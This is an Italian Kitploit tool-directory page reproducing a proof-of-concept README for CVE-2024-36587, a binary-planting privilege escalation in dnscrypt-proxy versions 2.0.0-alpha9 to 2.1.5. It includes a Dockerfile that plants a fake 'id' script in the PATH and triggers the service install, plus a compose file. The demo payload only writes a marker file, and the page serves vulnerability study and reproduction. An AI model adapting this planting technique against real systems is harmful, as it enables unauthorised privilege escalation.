Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/meeeeing/cve-2024-36587
Escalation di PrivilegiSicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitPenetration TestingBinary Exploitation
GitHubmeeeeing/cve-2024-36587

CVE-2024-36587

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-36587 - dnscrypt-proxy Local Privilege Escalation

Panoramica

  • Descrizione della vulnerabilità: a causa di un problema per cui il servizio dnscrypt-proxy, durante l'installazione, si fida dell'eseguibile nella directory corrente e lo registra, è possibile inserire un binario maligno per ottenere un'elevazione dei privilegi.
  • Versioni vulnerabili: dnscrypt-proxy v2.0.0-alpha9 ~ v2.1.5
  • Metodo PoC: binary planting

Configurazione dell'ambiente

root@kitploit:~
docker compose up --build

Una volta completate la build e l'esecuzione, il container viene creato.

Accesso all'interno del container:

root@kitploit:~
docker run -it --privileged dnscrypt-poc-poc bash

Attivazione della vulnerabilità

All'interno del container:

root@kitploit:~
/tmp/id
cat /tmp/poc_was_here

Se viene stampato Pwned_from_Docker, il PoC è riuscito.

File di configurazione

Dockerfile

root@kitploit:~
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y \
    git \
    golang-go \
    sudo

WORKDIR /workspace

RUN git clone https://github.com/DNSCrypt/dnscrypt-proxy.git && \
    cd dnscrypt-proxy && \
    git checkout tags/2.1.0 && \
    go build -o proxy ./dnscrypt-proxy

RUN bash -c 'echo -e "#!/bin/bash\necho Pwned_from_Docker > /tmp/poc_was_here" > /tmp/id' && \
    chmod +x /tmp/id && \
    ln -sf /tmp/id /usr/local/bin/id

CMD ["./dnscrypt-proxy/proxy", "-service", "install"]

docker-compose.yaml

root@kitploit:~
version: "3.8"

services:
  poc:
    build: .
    container_name: dnscrypt-poc
    privileged: true
    tty: true

Riferimenti

  • https://github.com/DNSCrypt/dnscrypt-proxy
  • https://nvd.nist.gov/vuln/detail/CVE-2024-36587

Screenshot dei risultati dell'esercitazione

docker build success

Rapporto dettagliato

Per un'analisi più dettagliata e i risultati dell'esercitazione, fare riferimento al seguente documento PDF:

PoC_Report_CVE-2024-36587.pdf

Scarica lo strumento